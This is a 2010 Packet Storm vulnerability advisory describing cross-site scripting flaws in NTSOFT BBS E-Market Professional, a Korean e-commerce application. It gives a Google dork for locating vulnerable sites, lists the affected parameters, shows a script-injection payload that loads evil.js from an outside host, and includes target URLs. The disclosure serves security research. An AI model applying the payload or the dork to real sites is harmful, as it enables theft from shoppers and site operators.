exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NTSOFT BBS E-Market Professional Cross Site Scripting

NTSOFT BBS E-Market Professional Cross Site Scripting
Posted Jul 6, 2010
Authored by Ivan Sanchez

NTSOFT BBS E-Market Professional suffers from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | d59f8b54923fb0c3f761481069771cef0d3757e583a8d5a34cecda9a6d474835

NTSOFT BBS E-Market Professional Cross Site Scripting

Change Mirror Download
+================================================================================================+
+ NTSOFT BBS E-Market Professional & XSS and Remote Execution Evil code +
+================================================================================================+


Author(s): Ivan Sanchez

Product: NTSOFT, All Right Reserved.

Vendor Overview: NTSOFT. (Korean ecommerce application)

Vendor Homepage: http://www.nt.co.kr/



Date: 03/07/2010


"most off all korean sites that handle e-shop , e-banking,... use this software"


Description:
------------

BBS E-Market Professional is a Korean Web based e-commerce application implemented in PHP.

BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system.
The issue presents itself due to improper validation of user-supplied data.




During 2009, I reported some bugs:
----------------------------------

http://www.packetstormsecurity.org/0907-exploits/ntsoft-xss.txt

http://www.securityfocus.com/bid/35893

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3152

http://xforce.iss.net/xforce/xfdb/52157

http://secunia.com/advisories/26117

http://www.juniper.net/security/auto/vulnerabilities/vuln35893.html



GOOGLE DORKS:
------------

intext: "NTSOFT All rights reserved"



Parameters affected:

-------------------

2010:

pageurl= evil.js
co_no= evil.js
b_temcode= evil.js



2009:

page= evil.js
bt_code= evil.js
b_no= evil.js






Evil Code to put:
-----------------

Example: "><script src=http://site/scripts/evil.js></script>




Example URl affected:
---------------------


2009:

http://[TARGET]becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code



2010:

http://TARGET/becommunity/community/index.php?pageurl= EVIL_CODE


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=93809&b_no=434&bt_code=17&page=1&flg=3&co_no=EVIL_CODE


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=19&page=7&flg=EVIL_CODE &co_no=105580


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=EVIL_CODEE&page=7&flg=3&co_no=105580





Thank you so Much! Ivan,


NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!

+================================================================================================+
+ NTSOFT BBS E-Market Professional & XSS and Remote Execution Evil code +
+================================================================================================+
















Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close